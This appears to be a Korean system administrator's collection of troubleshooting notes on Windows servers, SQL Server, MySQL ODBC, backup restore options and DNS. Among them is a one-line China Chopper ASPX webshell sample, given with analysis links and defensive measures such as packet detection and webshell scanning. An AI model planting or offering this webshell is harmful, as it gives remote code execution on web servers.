From HP.com
Foundation Agent 는 Windows OS 의 데이터를 수집.
이때,. 레지스트리 접근을 매우 많이 하므로 보안 이벤트로그의 감사 설정시 로그 공간을 소모가 빠름.
hp-insight-1.png
From HP.com
Foundation Agent 는 Windows OS 의 데이터를 수집.
이때,. 레지스트리 접근을 매우 많이 하므로 보안 이벤트로그의 감사 설정시 로그 공간을 소모가 빠름.
Windows Update 대신에,. 별로 SP1 Installer 를 이용해서 설치.
Microsoft Visual Studio 2010 서비스 팩 1(설치 관리자)
https://www.microsoft.com/ko-KR/download/details.aspx?id=23691
- 시스템 예약 파티션 (100M~300M)
- 드라이브 파티션 (ex, C / D.....)
1. 시스템 예약 파티션 복원 옵션
- Set drive active(for booting OS)
- Restore master boot record
2. 드라이브 파티션 복원 옵션
- Use Restore Anyware to recover to different hardware (라이센스 필요)
- Restore original disk signature
[Anyware restore]
http://www.symantec.com/docs/TECH55329
http://www.symantec.com/docs/TECH55822
http://www.symantec.com/docs/TECH212105
Delete Existing Drivers
Prompt for Drivers
Run Windows Mini-Setup
Type type = typeof(object); System.Reflection.FieldInfo[] f = type.GetFields(System.Reflection.BindingFlags.Public | System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.Instance); foreach(System.Reflection.FieldInfo _f in f) { Console.WriteLine(_f.Name + ":" + _f.GetValue(null)); }
Example, test.aspx
<%@ Page Language="Jscript"%><%eval(Request.Item["memeber"],"unsafe");%>
China Chopper Webshell - the 4KB that Owns your Web Server
http://informationonsecurity.blogspot.kr/2012/11/china-chopper-webshell.html
Breaking Down the China Chopper Web Shell ? Part II
http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html
- snort 류와 같은 솔루션/장비를 이용한 패킷 패턴 검출
- IIS 에서, .NET 신뢰수준 변경
- 웹사이트 업로드 경로에 허용되지 않은 파일 업로드 체크(코드수준)
- FTP 를 통해서 웹쉘 업로드가 가능하지 않도록 방화벽 제어
- 정기적인 웹쉘 스캔
....... 등등등............
# log4j.properties
log4j.logger.com.r1soft=INFO, NTEventLog
log4j.appender.NTEventLog=org.apache.log4j.nt.NTEventLogAppender
log4j.appender.NTEventLog.source=r1soft
log4j.appender.NTEventLog.Threshold=WARN
Google 8.8.8.8 / 8.8.4.4
Comodo Secure DNS 8.26.56.26 / 8.20.247.20
Norton ConnectSafe 199.85.126.10 / 199.85.127.10
OpenNIC 216.87.84.211 / 23.90.4.6
믿을만한 몇곳....
국내 ISP Cache DNS 는 일부 MX 쿼리 리턴을 이상하게 하는 경우가 있음.
#Red 상태 시, 발생 원인
#Amber 상태 시, 발생 원인
※ALARM LED (Red/Amber) 상태 해제 명령어
SSG-140 -> clear led alarm
- Windows Server 2008 R2
- mysql-connector-odbc-5.3.2-winx64.msi
Error 1918.Error installing ODBC driver MySQL ODBC 5.3 ANSI Driver, ODBC error 13: MySQL ODBC 5.3 ANSI Driver ODBC 드라이버의 설치 루틴을 시스템 오류 코드 126 때문에 로드하지 못했습니다.
지정된 모듈을 찾을 수 없습니다. (C:\Program Files\MySQL\Connector ODBC 5.3\myodbc5S.dll).. Verify that the file MySQL ODBC 5.3 ANSI Driver exists and that you can access it.
=> msvcr100.dll 를 참조하는데 실제 해당 파일이 없음. 대신 msvcr100_clr0400.dll 으로 존재. msvcr100_clr0400.dll 를 복사하여 msvcr100.dll 으로 이름 변경.
TCP 연결이 닫혔지만 SQL Server의 자식 프로세스에서 연결 소켓의 중복 항목을 보유 중일 수 있습니다. TcpAbortiveClose SQL Server 레지스트리 설정을 사용하도록 설정하고 SQL Server를 다시 시작하십시오. 문제가 계속되면 기술 지원 담당자에게 문의하십시오.
http://support.microsoft.com/kb/307197
할당량이 경고 값에 도달하여 Windows Management Instrumentation에서 WMIPRVSE.EXE를 중지했습니다. 할당량: HandleCount 값: 4098 최대값: 4096 WMIPRVSE PID: 3320 이 프로세스에서 호스트된 공급자: %systemroot%\system32\wbem\wmiprov.dll, C:\Windows\System32\wbem\WmiPerfClass.dll
8: File (RW-) C:\Windows\System32
D8: Section \BaseNamedObjects\Wmi Provider Sub System Counters
FC: Section \BaseNamedObjects\__ComCatalogCache__
114: Section \BaseNamedObjects\__ComCatalogCache__
124: Section \RPC Control\DSEC110C
2550: Section \BaseNamedObjects\GDA: ESENT Performance Data Schema Version 215
2A68: Section \BaseNamedObjects\Cor_Public_IPCBlock_4356
2C6C: Section \BaseNamedObjects\WmiReverseAdapterMemory_0
2C80: Section \BaseNamedObjects\netfxcustomperfcounters.1.0.net data provider for sqlserver
2CA8: Section \BaseNamedObjects\IISCounterControlBlock-.....
2CCC: Section \BaseNamedObjects\IISCacheCounters-4b70e2e0-....
2CEC: Section \BaseNamedObjects\ASP_PERFMON_BLOCK_00000f18
2E28: Section \BaseNamedObjects\MSDTC_STATS_FILE
2ECC: Section \BaseNamedObjects\IISSitesCounters-5d0a2dc8-....
301C: Section \BaseNamedObjects\netfxcustomperfcounters.1.0.net clr networking
3068: File (---) \Device\Mup
308C: Section \BaseNamedObjects\ASP_PERFMON_MAIN_BLOCK
312C: Section \LsaPerformance
3158: Section \BaseNamedObjects\IISSitesCounters-30cb6cdd....
31B4: Section \BaseNamedObjects\IDA1: ESENT Performance Data Schema Version 215
3210: File (R-D) C:\Windows\System32\ko-KR\utildll.dll.mui
33CC: Section \BaseNamedObjects\IISCacheCounters-0338985b-....
로그 이름: Application
이벤트 ID: 912
수준: 오류
업그레이드 단계 'u_tables.sql'에서 오류 25641, 상태 0, 심각도 16이(가) 발생하여 데이터베이스 'master'의 스크립트 수준을 업그레이드하지 못했습니다. 이 오류는 일반적인 작업을 수행하지 못하거나 데이터베이스가 오프라인 상태가 될 수도 있는 심각한 상태입니다. 'master' 데이터베이스를 업그레이드하는 동안 이 오류가 발생할 경우에는 전체 SQL Server 인스턴스를 시작할 수 없게 됩니다. 이전 오류 로그 항목에서 오류를 검사하고, 적절한 조치를 취한 후 데이터베이스를 다시 시작하여 스크립트 업그레이드 단계를 완료하십시오.
=> 서비스 계정을 인스턴스 서비스 계정에서 LocalSystem 계정으로